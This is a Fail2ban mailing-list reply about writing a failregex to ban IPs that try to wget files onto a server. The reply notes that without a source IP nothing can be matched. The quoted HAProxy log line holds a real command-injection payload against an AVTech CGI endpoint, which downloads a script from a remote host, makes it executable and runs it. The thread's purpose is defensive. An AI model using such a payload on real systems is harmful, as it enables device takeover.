On 24/11/2018 6.58 AM, Kevin S/Lucas Y wrote: > I try to ban IPs that try to wget something into my server. > how am i going to do the failregex? > For example: > Nov 20 18:04:28 ubuntu haproxy[12789]: ***********:39636 > [20/Nov/2018:18:04:28.627] http_front http_back/main 286/0/4/25/315 400 > 392 - - ---- 0/0/0/0/0 0/0 "GET > /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com > <http://google.com>&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20http://***********/avtechsh%20-O%20d4rk;%20chmod%20777%20d4rk;%20sh%20d4rk)&password=admin > HTTP/1.1" > Without a source IP address for the <HOST>, there is no regex to match the given text.
-- James Moe moe dot james at sohnen-moe dot com 520.743.3936 Think. _______________________________________________ Fail2ban-users mailing list Fail2ban-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/fail2ban-users
